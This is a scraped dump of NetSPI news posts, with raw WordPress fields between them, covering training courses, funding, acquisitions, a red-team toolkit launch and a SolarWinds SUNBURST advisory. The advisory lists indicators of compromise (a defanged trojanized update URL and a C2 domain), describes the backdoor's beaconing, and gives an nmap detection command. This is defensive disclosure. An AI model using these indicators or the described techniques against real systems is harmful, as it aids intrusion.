As experts anticipateI cloud adoption to soar in the aftermath of the COVID-19 pandemic, this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23-24, 2021 and will be conducted virtually. The two-day training session costs $2,000/person.

“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)Cybersecurity Workforce StudyII,” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”

“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.

“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how level up their on-premise penetration testing skills and apply them to Azure cloud.”

NetSPI’s Dark Side Ops trainings, DSO 1: Malware DevDSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting are available as private trainings, upon request. Contact NetSPI for more information regarding private group training sessions.

For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.

Dark Side Ops 3: Azure Cloud Pentesting virtual course on August 23–24, 2021 (9AM to 5PM CT)

Gartner Newsroom; November 17, 2020; https://www.gartner.com/en/newsroom/press-releases/2020-11-17-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-18-percent-in-2021
II (ISC)2 Cybersecurity Workforce Study 2020; https://www.isc2.org/Research/Workforce-Study

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

[post_title] => Azure Cloud Pentesting Added to NetSPI’s Roster of Cybersecurity Training Courses [post_excerpt] => Learn how to exploit, prevent, and remediate critical Azure cloud vulnerabilities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-cloud-pentesting-cybersecurity-training [to_ping] => [pinged] => [post_modified] => 2021-06-23 14:04:03 [post_modified_gmt] => 2021-06-23 19:04:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25552 [menu_order] => 171 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [39] => WP_Post Object ( [ID] => 25333 [post_author] => 91 [post_date] => 2021-05-12 11:00:00 [post_date_gmt] => 2021-05-12 11:00:00 [post_content] =>
Investment to Fuel Innovation and Growth, Including Global Expansion and Product Innovation

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced it has raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. The investment will be used to further accelerate NetSPI’s rapid growth by expanding the company’s cyber security and client experience teams, investing in product innovation, and deepening operations across U.S. and international markets.

“The reality is that cyber security attacks today are inevitable and put organizations at grave risk,” said NetSPI President and Chief Executive Officer Aaron Shilts. “At NetSPI, we strive to stay one step ahead of hackers, breaches, and bad actors by focusing on prevention-based security techniques. Rooted in the founding tenets of the company, our goals are purposely aggressive to help our clients adapt to the constantly evolving threat landscape.”

Since its founding, NetSPI has focused its services to help companies proactively defend themselves from cyberattacks through a robust and innovative technology platform, allowing NetSPI’s team of experts to thoroughly identify security vulnerabilities. At a time when cyber security spending is expected to exceed $200 billion per year by 2024, according to a recent Bloomberg Intelligence (BI) report, more companies are preparing to fend off sophisticated cyber-attacks and avoid reputational and business risks.

“Our clients rely on us to help secure their ever-evolving attack surface by leveraging our expertise in cloud, red team, application, and network security,” continued Shilts. “This investment from KKR and Ten Eleven Ventures allows NetSPI to better meet this demand while simultaneously fueling growth and innovation as a leader in the booming cyber security market. With our investors’ support, NetSPI will continue to transform the industry with a focus on attack surface management, enterprise security testing, and vulnerability management.”

“NetSPI has built a differentiated suite of tech-enabled services and test orchestration and reporting software that is not only enhancing cyber security for complex global enterprises across a wide range of industries, but is simultaneously disrupting the traditional penetration testing market in order for these enterprises to continuously test their applications, networks, and cloud infrastructures at scale,” said Ben Pederson, Principal at KKR. “We are excited to invest in NetSPI’s growth as they build and deliver these critically important offensive security solutions.”

Jake Heller, Head of KKR’s Technology Growth team in the Americas, added: “Aaron and his team have a deep appreciation for the needs of their customers and the increasing demand for best-in-class, tech-enabled cyber security systems.”

KKR is investing in NetSPI through its Next Generation Technology Growth Fund II. KKR and Ten Eleven Ventures have invested in market-leading cyber security companies including Darktrace, KnowBe4, Ping Identity, Cylance, ForgeRock, and ReliaQuest.

“Penetration testing is a critical component of any enterprise’s security program and will continue to be an important part of compliance and regulatory requirements in the future,” said Mark Hatfield, General Partner, Ten Eleven Ventures. “With its deep expertise and automated platform, NetSPI has developed an incredibly effective and efficient approach to penetration testing and attack surface management. We’re thrilled to partner with this exceptional team and look forward to drawing on our cyber security expertise to help NetSPI bring its technology to more companies across the globe.”

After spending its first several years as a bootstrapped, profitable business, in 2017 NetSPI partnered with Sunstone Partners, who has been instrumental to the company’s growth post-investment. Gus Alberelli, Managing Director of Sunstone Partners, said: “We’re incredibly fortunate to partner with NetSPI’s team and proud of the company’s extraordinary growth stemming from its technology-enabled penetration testing team. We are excited for KKR and Ten Eleven Ventures to join Sunstone Partners in supporting NetSPI’s growth journey.”

The investment is the latest transaction in a period of accelerated growth for NetSPI. Most recently, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. In 2020, NetSPI launched Penetration Testing as a Service (PTaaS) powered by its Resolve™ platform. Upcoming additions of risk scoring, vulnerability intelligence, breach and attack simulation, and more will continue to differentiate NetSPI's technology offerings.

Goodwin Procter LLP advised NetSPI on the transaction and Latham & Watkins LLP advised KKR and Ten Eleven Ventures.

[wonderplugin_video iframe="https://vimeo.com/547974617" lightbox=0 lightboxsize=1 lightboxwidth=960 lightboxheight=540 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=960 videoheight=540 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Tool Kit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

About KKR

KKR is a leading global investment firm that offers alternative asset management and capital markets and insurance solutions. KKR aims to generate attractive investment returns by following a patient and disciplined investment approach, employing world-class people, and supporting growth in its portfolio companies and communities. KKR sponsors investment funds that invest in private equity, credit and real assets and has strategic partners that manage hedge funds. KKR’s insurance subsidiaries offer retirement, life, and reinsurance products under the management of The Global Atlantic Financial Group. References to KKR’s investments may include the activities of its sponsored funds and insurance subsidiaries. For additional information about KKR & Co. Inc. (NYSE: KKR), please visit KKR’s website at www.kkr.com and on Twitter @KKR_Co.

About Ten Eleven Ventures

Ten Eleven Ventures is the original venture capital firm focused solely on investing in digital security. The firm invests globally and at all stages, from seed to growth (the latter via its Joint Investment Alliance with KKR). Since its founding in Silicon Valley in 2015, Ten Eleven Ventures has raised nearly $US 500 million and invested in 30 leading cybersecurity companies including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.

About Sunstone Partners

Sunstone Partners is a growth-oriented private equity firm that makes majority and minority investments in technology-enabled services and software businesses. Recently recognized as one of Inc.’s 2020 PE 50 founder-friendly private equity firms for entrepreneurs, the firm seeks to partner with exceptional management teams, often as their first institutional capital partner, to help accelerate organic growth and fund acquisitions. Founded in 2015, the firm has $800 million of committed capital to its first two funds. For more information, visit www.sunstonepartners.com.

Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

KKR
Cara Major or Miles Radcliffe-Trenner
Media@KKR.com
(212) 750-8300

Ten Eleven Ventures
Megan Dubofsky
mdubofsky@1011vc.com
(917) 576-5590

[post_title] => Cyber Security Penetration Testing Leader NetSPI Secures $90 Million in Growth Funding Led by KKR [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cybersecurity-funding-investment-kkr [to_ping] => [pinged] => [post_modified] => 2021-05-12 14:13:05 [post_modified_gmt] => 2021-05-12 14:13:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25333 [menu_order] => 180 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [40] => WP_Post Object ( [ID] => 25347 [post_author] => 91 [post_date] => 2021-05-12 05:00:16 [post_date_gmt] => 2021-05-12 05:00:16 [post_content] =>

On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI:

Today we’re pleased to announce our investment in NetSPI. In cybersecurity, understanding where weaknesses lie is a critical first step in defense. One crucial way to assess this is through penetration testing, where “ethical hackers” attempt to break into your systems before attackers can. Penetration testing is often required of technology vendors by their customers and a mandated part of certain required compliance programs and certifications, including SOC 2. Because of its importance, pen testing represents a $1.7Bn market growing at 22% a year – but companies are always looking for a way to do it in a faster and easier manner.

Read more here: https://www.1011vc.com/news/why-we-invested-in-netspi/

[post_title] => Ten Eleven: Why We Invested in NetSPI [post_excerpt] => On May 12, 2021, NetSPI announced new funding from KKR and Ten Eleven. Learn why Ten Eleven chose to invest in NetSPI. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => ten-eleven-why-we-invested-in-netspi [to_ping] => [pinged] => [post_modified] => 2022-04-04 11:57:11 [post_modified_gmt] => 2022-04-04 16:57:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25347 [menu_order] => 182 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [41] => WP_Post Object ( [ID] => 23017 [post_author] => 91 [post_date] => 2021-02-09 07:00:16 [post_date_gmt] => 2021-02-09 07:00:16 [post_content] =>
NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today relaunched Red Team Toolkit, a sophisticated suite of penetration testing and adversary simulation tools. NetSPI integrated and advanced the Toolkit after the acquisition of Silent Break Security in late 2020.  It features a re-designed web-based user experience and improved functionality that supports more advanced and collaborative red team operations.

“We designed the all-new Red Team Toolkit Platform to better emulate sophisticated, real-world attackers after observing critical gaps left by other well-signatured tools on the market,” said Brady Bloxham, Chief Technology Officer at NetSPI. “We continue to use the platform on our own red team operations and are constantly updating it with the latest offensive techniques and defensive countermeasures. It is the most capable offensive toolkit available to red teams today.

Red Team Toolkit’s tooling and features include:

  • Slingshot: Slingshot is a Windows post-exploitation agent used by red teams to conduct advanced network cyber-operations. Designed with stealth in mind, it enables operators to accurately emulate sophisticated adversaries. It increases the speed and efficiency of advanced operations through malleable network profiles, direct syscall execution, memory obfuscation, blended HTML traffic, scripting automation interface, and more.
  • Improved user experience: Its new web-based user interface was built with the operator experience and productivity top of mind. It is a command and control (C2) server, providing a unified interface for all current and future tools.
  • Multi-user support: The all-new Red Team Toolkit Platform supports multi-user interaction with tiered access permissions. This provides mirrored output, improved team collaboration, seamless operations, and training opportunities.
  • Keyboard-centric controls: Inspired by a traditional terminal, red teamers will feel at home with keyboard-centric controls and an integrated command palette.
  • Functional storage: Connect Red Team Toolkit to your existing database infrastructure or a simple SQLite file. Everything is well-formed, easily parsed, and recorded in one central location.

“Our teams think like adversaries and perform red teaming for some of the most advanced organizations in the world,” said Aaron Shilts, President and CEO of NetSPI. “We take pride in building technology that change how our clients think about their penetration testing programs and the industry as a whole - and we are thrilled to make it available to others with the reintroduction of Red Team Toolkit.”

Learn more about how Red Team Toolkit can optimize your Red Team engagements and increase productivity. Contact sales@netspi.com.

[wonderplugin_video iframe="https://youtu.be/zAFdEiGFQC4" lightbox=0 lightboxsize=1 lightboxwidth=960 lightboxheight=540 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=960 videoheight=540 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

About NetSPI

NetSPI is the leader in enterprise penetration testing and attack surface management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

[post_title] => NetSPI Relaunches Red Team Toolkit [post_excerpt] => NetSPI’s toolkit for covert adversary simulations is now available to enterprise red teams with new features and functionality. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-relaunches-red-team-toolkit [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:25 [post_modified_gmt] => 2021-04-14 06:52:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=21247 [menu_order] => 202 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [42] => WP_Post Object ( [ID] => 23016 [post_author] => 91 [post_date] => 2021-01-26 07:00:06 [post_date_gmt] => 2021-01-26 07:00:06 [post_content] =>
Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors.
Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, achieved 35% organic revenue growth in fiscal year 2020, added over 150 new clients, and expanded its team to more than 200 employees. NetSPI’s Penetration Testing as a Service (PTaaS) delivery model, core service expansion, and Silent Break Security acquisition all contributed to its strong growth. Since 2017, NetSPI has tripled its topline revenue while remaining profitable. As NetSPI looks forward to 2021, the company has promoted Aaron Shilts to President and CEO and Charles Horton to COO. NetSPI co-founder Deke George will assume a new role as Chairman on the Board of Directors and remain actively involved in the company. “2020 was full of challenges, not only for our team, but also for our clients. I’m proud of the rapid growth this team has achieved and how we’ve adapted and scaled to support our clients at a time when people and organizations are more vulnerable,” said Shilts. “More businesses recognize the foundational importance of secure software. As such, I anticipate that NetSPI’s core business in application security, vulnerability management, and cloud testing will experience even higher demand in 2021.” Achievements that contributed to NetSPI’s 2020 success include,
  • Penetration Testing as a Service (PTaaS) Powered by Resolve™: PTaaS enables customers to simplify the scoping of new engagements, view their testing results in real-time, orchestrate faster remediation, perform always-on continuous testing, and more – all through the Resolve vulnerability management and orchestration platform.
  • Cloud Security Testing Expansion: NetSPI expanded its industry-leading cloud penetration testing services to include the AWS, Azure, Google, and Oracle cloud environments, for both point-in-time and continuous testing.
  • Strategic Advisory Services: This new consulting service builds and improves application security programs. The core functions of Strategic Advisory Services include program benchmarking, roadmap development, and security metrics.
  • Static Application Security Testing (SAST) and Secure Code Review (SCR): NetSPI enhanced its SAST and SCR services to help development teams establish a more strategic approach to building secure applications and identifying vulnerabilities earlier in the software development lifecycle (SDLC).
  • Silent Break Security Acquisition: NetSPI acquired Silent Break Security to complete its offensive cybersecurity and attack surface management offerings. Silent Break Security’s manual testing team, proprietary Adversary Simulation and Red Team Toolkit software, and enterprise clients improve NetSPI’s ability to scale up vulnerability management programs to meet client needs.
  • NetSPI Thought Leadership: In 2020, NetSPI spotlighted its roster of technology and management experts, creating a breadth of thought leadership content across several platforms including the executive and technical blogs, webinars, downloadable resources, and the Agent of Influence podcast.
  • Philanthropic Activities: NetSPI became a sponsor for Change Starts With Me, a grassroots movement working to rebuild communities impacted by social, health, and economic crises. The company also continues to work closely with the University of Minnesota Masonic Children’s Hospital and raised funds to support World Central Kitchen, MasksOn.org, and Northside Funders Group.
"Technology innovation is what we do best. It’s the foundation on which we built NetSPI,” said Deke George. “This was evident over the past 12 months, and I believe NetSPI is leading a revolutionary shift in the way penetration testing and vulnerability management is performed.” “We come into the new year with incredible momentum and continued focus on delivering an exceptional client experience,” Shilts said. “In 2021 we will extend the intelligence and automation features of our Resolve platform. With data from over 80 million vulnerabilities, we give our customers access to the most robust risk scoring system on the market, the power to predict the likelihood of vulnerabilities in their environment, and the ability to automatically run adversary simulations across their entire attack surface.” Join NetSPI’s mailing list to be the first to receive company, product, and services updates. Sign up here.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on FacebookTwitter, and LinkedIn. Media Contacts: Jean Hill, Maccabee PR for NetSPI jean@maccabee.com (612) 294-3154 Tori Norris, NetSPI victoria.norris@netspi.com (630) 258-0277 [post_title] => NetSPI Celebrates 35% Organic Revenue Growth in 2020 [post_excerpt] => Following a successful year, NetSPI promotes Aaron Shilts to CEO while co-founder Deke George assumes a new role on the Board of Directors. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => celebrates-35-percent-organic-revenue-growth-in-2020 [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:31 [post_modified_gmt] => 2021-04-14 06:52:31 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=21134 [menu_order] => 207 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [43] => WP_Post Object ( [ID] => 20716 [post_author] => 91 [post_date] => 2020-12-15 09:41:57 [post_date_gmt] => 2020-12-15 09:41:57 [post_content] =>

As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.

While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.

For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.

Overview: SolarWinds Orion Manual Supply Chain Attack

On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.

FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.

  • Attack Origin: UNC2452 gained access to victims via trojan-based updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574 /SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
  • How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
  • Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.

Known breaches include:

FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.

U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.

Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:

  1. First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the subnet mask. If the Orion agent is found, follow SolarWinds’ recommendations.
  2. SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
  3. Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.

Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.

[post_title] => FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now? [post_excerpt] => As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => fireeye-solarwinds-us-treasury-whats-happening-in-the-cyber-security-world-right-now [to_ping] => [pinged] => [post_modified] => 2021-05-04 17:03:39 [post_modified_gmt] => 2021-05-04 17:03:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20716 [menu_order] => 217 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [44] => WP_Post Object ( [ID] => 20550 [post_author] => 91 [post_date] => 2020-12-02 07:00:59 [post_date_gmt] => 2020-12-02 07:00:59 [post_content] =>
With the acquisition of Silent Break Security, NetSPI will expand and enhance adversary simulation software and services.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, today announced its acquisition of Silent Break Security, a Utah-based security testing firm which specializes in network and application testing, red teaming, and adversary simulation. Through this acquisition, NetSPI will broaden its footprint to create a complete package for offensive cyber security and attack surface management. With the integration of Silent Break Security’s manual testing team, along with their proprietary software platforms and toolsets, NetSPI will improve its ability to scale up vulnerability management programs to meet client needs.

“It’s our vision to secure the world’s attack surfaces with brilliant people and disruptive technology. The Silent Break Security team is the perfect complement to our strong culture and its software stack a natural fit for helping us drive innovation and leverage technology as a force multiplier,” said Aaron Shilts, President and COO of NetSPI. “I am very excited about the opportunity this presents our team. By leveraging the skills that Brady built in his Silent Break Security team, I believe NetSPI has an opportunity to disrupt the penetration testing industry.”

“It is rare to find two organizations that align so closely from a mission, vision, values, and culture perspective,” added Brady Bloxham, Founder and CEO of Silent Break Security. “Both organizations have cultures of high performance, innovation, and agility. Individually, NetSPI and Silent Break have been working toward many of the same goals and, now together, we will become a much greater force to be reckoned with.”

The combined NetSPI and Silent Break team will provide a complete package for offensive security through the following core strategies:

  • Industry Leading Talent: NetSPI’s expert penetration testers conduct over 150,000 hours of testing each year and deliver technical and thought leadership content to the industry. The addition of Silent Break Security’s team, many with U.S. Department of Defense (DoD) experience, will position the combined company as the industry’s strongest penetration testing provider.
  • Technology Innovation: At the foundation of the acquisition is innovation through proprietary technology. Acquiring Silent Break Security and its technology –adversary simulation software (Silent Break Central), Red Team Toolkit, among other tools – with the goal of integrating these into NetSPI’s Resolve™ vulnerability management and orchestration software, will enable the company to consistently find vulnerabilities that others miss, accelerate remediation, provide always-on continuous testing, and simplify the entire testing process.
  • Focus on Training: The commitment to quality is evident in each organization’s emphasis on continuous professional development and training programs for employees and client security teams. Silent Break Security will bring its in-depth training programs on malware development, adversary simulations, and offensive machine learning to NetSPI employees and clients to complement NetSPI’s acclaimed NetSPI University employee training program.
  • Penetration Testing as a Service (PTaaS): The acquired technologies and expertise will allow NetSPI to optimize its core penetration testing service: PTaaS. Automated scanning, real-time reporting, and streamlined remediation processes offered through PTaaS will give the manual testing team more time to focus on the difficult, hard-to-find vulnerabilities that only humans can find. Silent Break’s software fits perfectly into our strategy to deliver always-on attack surface management giving Resolve customers the ability to run internal automated red team “plays” throughout the year.

Brady Bloxham, Founder and CEO of Silent Break Security will become NetSPI’s Chief Technology Officer (CTO). Silent Break Security operations and team members will remain in Lehi, Utah and throughout the U.S.

To learn more about the acquisition of Silent Break Security, connect with the NetSPI team by contacting Heather Rubash (heather.rubash@netspi.com; (612) 385-3006). Keep up to date with NetSPI’s latest news: visit netspi.com.

Watch NetSPI's special announcement from President and COO, Aaron Shilts

[wonderplugin_video iframe="https://youtu.be/ffJlDBdNcJo" lightbox=0 lightboxsize=1 lightboxwidth=960 lightboxheight=540 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=960 videoheight=540 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

Watch this special announcement from Silent Break Security’s Founder and CEO, Brady Bloxham — now NetSPI’s CTO

[wonderplugin_video iframe="https://youtu.be/VBfJJAqTL78" lightbox=0 lightboxsize=1 lightboxwidth=960 lightboxheight=540 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=960 videoheight=540 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with eight of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of growth equity firm Sunstone Partners. Follow us on FacebookTwitter, and LinkedIn.

Media Contacts:
Jean Hill, Maccabee PR for NetSPI
jean@maccabee.com
(612) 294-3154

Heather Rubash, NetSPI
heather.rubash@netspi.com
(612) 385-3006

